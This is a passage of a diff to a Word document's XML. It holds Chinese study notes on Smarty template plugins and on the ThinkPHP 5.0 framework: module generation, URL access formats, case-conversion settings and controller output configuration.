-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="17" name="图片 17"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F06575A" wp14:editId="213130D8">
+                  <wp:extent cx="3962400" cy="1614805"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+                  <wp:docPr id="16" name="图片 16"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -1641,6 +1508,139 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
+                            <a:ext cx="3962400" cy="1614805"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6437" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>修饰</w:t>
+            </w:r>
+            <w:r>
+              <w:t>插件</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>：</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>注册</w:t>
+            </w:r>
+            <w:r>
+              <w:t>时选择</w:t>
+            </w:r>
+            <w:r>
+              <w:t>modifier</w:t>
+            </w:r>
+            <w:r>
+              <w:t>，</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>与函数的区别是在模板中调用的格式不一样</w:t>
+            </w:r>
+            <w:r>
+              <w:t>，其他一致。</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>区块</w:t>
+            </w:r>
+            <w:r>
+              <w:t>函数插件：</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>调用</w:t>
+            </w:r>
+            <w:r>
+              <w:t>格式与函数相同，多了一个区块结束符，并且区块中的内容</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>也会作为</w:t>
+            </w:r>
+            <w:r>
+              <w:t>参数进入函数处理：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="150" w:firstLine="315"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>定义</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1630B436" wp14:editId="5966F0C3">
+                  <wp:extent cx="3931285" cy="2196465"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="17" name="图片 17"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId15"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
                             <a:ext cx="3931285" cy="2196465"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
@@ -1703,7 +1703,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId15"/>
+                          <a:blip r:embed="rId16"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -1763,6 +1763,73 @@
         <w:t>框架</w:t>
       </w:r>
     </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>具体</w:t>
+      </w:r>
+      <w:r>
+        <w:t>的</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ThinkPHP</w:t>
+      </w:r>
+      <w:r>
+        <w:t>参考手册请点击以下链接</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:t>以下</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>仅为</w:t>
+      </w:r>
+      <w:r>
+        <w:t>简单</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>零散</w:t>
+      </w:r>
+      <w:r>
+        <w:t>知识点</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId17" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a5"/>
+          </w:rPr>
+          <w:t>ThinkPHP5.0</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a5"/>
+          </w:rPr>
+          <w:t>参考手册</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="a4"/>
@@ -1786,7 +1853,7 @@
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="359F88DA" wp14:editId="53E4E31E">
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="489FC278" wp14:editId="33F44BD6">
                   <wp:extent cx="3950335" cy="1972310"/>
                   <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                   <wp:docPr id="10" name="图片 10"/>
@@ -1801,7 +1868,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId16"/>
+                          <a:blip r:embed="rId18"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -1822,18 +1889,33 @@
               </w:drawing>
             </w:r>
           </w:p>
-          <w:p>
-            <w:r>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6441" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
               <w:t>ThinkPHP</w:t>
             </w:r>
             <w:r>
-              <w:t>框架：</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>框架</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
               </w:rPr>
             </w:pPr>
             <w:r>
@@ -1841,7 +1923,7 @@
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="735B93BA" wp14:editId="26E42907">
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E0E2D34" wp14:editId="40E90346">
                   <wp:extent cx="3950335" cy="722630"/>
                   <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                   <wp:docPr id="11" name="图片 11"/>
@@ -1856,7 +1938,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId17"/>
+                          <a:blip r:embed="rId19"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -1876,18 +1958,790 @@
                 </wp:inline>
               </w:drawing>
             </w:r>
-            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-            <w:bookmarkEnd w:id="0"/>
-          </w:p>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>安装</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>在</w:t>
+            </w:r>
+            <w:r>
+              <w:t>application</w:t>
+            </w:r>
+            <w:r>
+              <w:t>目录下创建</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>build</w:t>
+            </w:r>
+            <w:r>
+              <w:t>.php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>，</w:t>
+            </w:r>
+            <w:r>
+              <w:t>定义模块的基本信息，执行</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>php console build</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>就</w:t>
+            </w:r>
+            <w:r>
+              <w:t>自动生成目录</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>结构了</w:t>
+            </w:r>
+            <w:r>
+              <w:t>。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="6441" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>访问</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>URL</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>默认</w:t>
+            </w:r>
+            <w:r>
+              <w:t>方式：</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>需</w:t>
+            </w:r>
+            <w:r>
+              <w:t>开启</w:t>
+            </w:r>
+            <w:r>
+              <w:t>pathinfo</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>http://</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>serverName/index.php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>（或者其它应用入口文件）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>模块</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>控制器</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>操作</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>/[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>参数名</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>参数值</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>...]</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>兼容</w:t>
+            </w:r>
+            <w:r>
+              <w:t>模式</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>http</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>://serverName/index.php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>（或者其它应用入口文件）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>?s=/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>模块</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>控制器</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>操作</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>/[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>参数名</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>参数值</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>...]</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>不支持</w:t>
+            </w:r>
+            <w:r>
+              <w:t>传统的</w:t>
+            </w:r>
+            <w:r>
+              <w:t>url</w:t>
+            </w:r>
+            <w:r>
+              <w:t>文件路径方式访问</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>。</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>URL</w:t>
+            </w:r>
+            <w:r>
+              <w:t>模式不区分模块</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>控制器等</w:t>
+            </w:r>
+            <w:r>
+              <w:t>的大小写，</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>打开</w:t>
+            </w:r>
+            <w:r>
+              <w:t>大小写限制：</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>application</w:t>
+            </w:r>
+            <w:r>
+              <w:t>/config.php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>中</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>关闭控制器名的自动转换</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>'url_controller_convert'    =&gt;  false,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>关闭操作名的自动转换</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>'url_action_convert'        =&gt;  false,</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6437" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>控制器</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>数据输出</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>控制器</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>输出统一使用</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>response</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>的方式</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>，</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>如下：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="150" w:firstLine="315"/>
+              <w:rPr>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$data = ['name'=&gt;'thinkphp','url'=&gt;'thinkphp.cn'];</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="150" w:firstLine="315"/>
+              <w:rPr>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>return ['data'=&gt;$data,'code'=&gt;1,'message'=&gt;'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>操作完成</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'];</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>在</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>config.php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>中</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>可以设置以下</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>值</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>设置返回格式：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'default_return_type'=&gt;'json'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>，</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>可取值有</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>json</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>，</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>html</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>，</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>text</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>，</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>jsonp</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:noProof/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -1899,20 +2753,4782 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>TP</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>配置：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>所有</w:t>
+            </w:r>
+            <w:r>
+              <w:t>可以使用的配置项在</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>thinkphp/convention.php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>文件</w:t>
+            </w:r>
+            <w:r>
+              <w:t>中，并且已经有默认配置，可以选择需要的配置项放入</w:t>
+            </w:r>
+            <w:r>
+              <w:t>config.php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>进行</w:t>
+            </w:r>
+            <w:r>
+              <w:t>配置。</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>配置</w:t>
+            </w:r>
+            <w:r>
+              <w:t>格式</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
